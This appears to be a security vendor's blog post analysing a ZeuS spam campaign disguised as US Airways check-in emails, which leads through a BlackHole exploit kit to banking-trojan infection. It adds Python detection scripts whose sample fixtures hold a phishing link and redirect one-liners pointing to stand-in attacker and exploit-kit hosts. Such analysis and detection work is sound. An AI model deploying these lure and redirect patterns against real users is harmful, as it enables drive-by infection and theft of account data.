I got a plane ticket from ZeuS!

Not a week goes by without another spam campaign; this week we present the US Airways ticket scam. The malware behind it is the same as in the previous post: ZeuS, a.k.a. Zbot, detected by Emsisoft Anti-Malware as Trojan-Spy.Win32.Zbot.

The following email subjects are being used:

  • US Airways online check-in.
  • US Airways online check-in confirmation.
  • US Airways reservation confirmation.
  • Confirm your US airways online reservation.

[Screenshot: the US Airways spam email]

You have to check in from 24 hours and up to 60 minutes before your flight (2 hours if you’re flying internationally). After the check-in, all you need to do is print your boarding pass and proceed to the gate.

Confirmation code: 772129

Check-in online: Online reservation details

Flight: 8507

Departure city and time: Washington, DC (DCA) 10:00PM

Depart date: 4/5/2012
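The lure above follows a simple pattern: one of the four campaign subjects, a plausible confirmation code, and a single link whose visible text ("Online reservation details") hides where it really points. As an added example that is not part of the original post or Emsisoft's tooling, the following script triages a raw e-mail along those two lines: it matches the subject against the list above and flags any link whose host is not the impersonated brand's domain. The sample message, the sender address and the attacker host `attacker.example.net` are constructed for this example.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Subject lines reported for this campaign, lower-cased for comparison.
CAMPAIGN_SUBJECTS = {
    "us airways online check-in.",
    "us airways online check-in confirmation.",
    "us airways reservation confirmation.",
    "confirm your us airways online reservation.",
}

# Domain the lure impersonates; a "US Airways" mail linking elsewhere is suspect.
LEGIT_DOMAIN = "usairways.com"


class _LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from the HTML body of the mail."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def triage(raw_message: bytes) -> dict:
    """Return subject match, off-brand links and an overall verdict for one mail."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    subject = (msg["Subject"] or "").strip()
    subject_hit = subject.lower() in CAMPAIGN_SUBJECTS

    links = []
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is not None:
        parser = _LinkExtractor()
        parser.feed(html_part.get_content())
        links = parser.links

    suspicious = []
    for href, text in links:
        host = (urlparse(href).hostname or "").lower()
        if host != LEGIT_DOMAIN and not host.endswith("." + LEGIT_DOMAIN):
            suspicious.append({"href": href, "text": text, "host": host})

    return {
        "subject": subject,
        "subject_match": subject_hit,
        "suspicious_links": suspicious,
        "verdict": "phish" if subject_hit and suspicious else "clean",
    }


# Constructed sample modelled on the lure quoted above; sender, host and path are invented.
SAMPLE = b"""From: US Airways <reservations@usairways.com>
To: victim@example.com
Subject: US Airways online check-in confirmation.
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Confirmation code: 772129</p>
<p>Check-in online: <a href="http://attacker.example.net/flight/check-in.html">Online reservation details</a></p>
</body></html>
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The subject check alone is brittle (the next campaign will use different wording), so the verdict requires both signals; in practice the off-brand link check is the one that keeps working across lures.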

Clicking on the malicious link will take you to this screen:

[Screenshot: the landing page reached via the malicious link]

Looking at the source of the page, we can see that it loads four JavaScript files from another URL:

[Screenshot: page source showing the four external script references]

All of these scripts point to the same BlackHole Exploit Kit server and contain nothing but the following text:

[Screenshot: the content of the scripts]
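The structure described in the two previous steps (a landing page pulling several scripts from other hosts, each of which does nothing but redirect the browser to one exploit-kit URL) is itself a detectable pattern. The script below is an added example, not code from the original post, that automates that analysis offline: it extracts `<script src>` references, keeps those on a different host than the page, and recognises a script body that consists only of a location assignment. The landing page, the four gate hosts under `example.net`, the kit URL `http://kit.example.net/main.php?page=abc123` and the `fetch` callback that serves script bodies from an in-memory dict are all constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _ScriptSrcExtractor(HTMLParser):
    """Collect the src attribute of every <script> tag on a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


# A gate script is nothing but an assignment to the browser location, e.g.
#   document.location='http://.../main.php?page=...';
# Both document/window and the optional .href form are accepted.
REDIRECT_RE = re.compile(
    r"""^\s*(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]\s*;?\s*$"""
)


def external_scripts(page_url, html):
    """Absolute URLs of scripts loaded from a host other than the page's own."""
    parser = _ScriptSrcExtractor()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    result = []
    for src in parser.srcs:
        full = urljoin(page_url, src)
        if urlparse(full).hostname != page_host:
            result.append(full)
    return result


def redirect_target(script_body):
    """Return the URL a pure redirect script sends the browser to, else None."""
    m = REDIRECT_RE.match(script_body)
    return m.group(1) if m else None


def analyse(page_url, html, fetch):
    """Map each redirect destination to the gate scripts that point at it.

    fetch(url) must return the script body; here it is served from a dict so the
    example runs offline. Several gate scripts converging on one URL is the
    exploit-kit pattern described in the post.
    """
    targets = {}
    for src in external_scripts(page_url, html):
        dest = redirect_target(fetch(src))
        if dest:
            targets.setdefault(dest, []).append(src)
    return targets


# Constructed sample: a compromised site hosting the landing page, four gate
# scripts on other hosts, and one legitimate local script for contrast.
LANDING_URL = "http://compromised.example.org/us-airways/check-in.html"
LANDING_HTML = """<html><head>
<script src="http://host-a.example.net/js/a.js"></script>
<script src="http://host-b.example.net/js/b.js"></script>
<script src="http://host-c.example.net/js/c.js"></script>
<script src="http://host-d.example.net/js/d.js"></script>
<script src="/local/site.js"></script>
</head><body>Please wait, redirecting...</body></html>"""

KIT_URL = "http://kit.example.net/main.php?page=abc123"
SCRIPTS = {
    "http://host-a.example.net/js/a.js": "document.location='%s';" % KIT_URL,
    "http://host-b.example.net/js/b.js": "document.location='%s';" % KIT_URL,
    "http://host-c.example.net/js/c.js": 'window.location.href = "%s";' % KIT_URL,
    "http://host-d.example.net/js/d.js": "document.location='%s';" % KIT_URL,
    "http://compromised.example.org/local/site.js": "function f(){return 1;}",
}

if __name__ == "__main__":
    for dest, gates in analyse(LANDING_URL, LANDING_HTML, SCRIPTS.get).items():
        print("%d gate script(s) redirect to %s" % (len(gates), dest))
```

Real gate scripts are often lightly obfuscated (string concatenation, hex escapes), so in production the `redirect_target` check is a first filter rather than the whole detection; the convergence test in `analyse` is the robust part, since every gate has to end up at the same kit URL.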

This address serves Java and Adobe (PDF) exploits to infect the system. Emsisoft Anti-Malware detects these as Exploit.Java.Blacole and Exploit.JS.Pdfka.

[Screenshot: Emsisoft Anti-Malware exploit detections]

Finally, once the system is exploited, further malicious executables are downloaded and the ZeuS payload starts stealing sensitive account information.

ZeuS is one of the best-known banking trojans and is very widely spread. We recommend keeping your security software, Java and Adobe products up to date.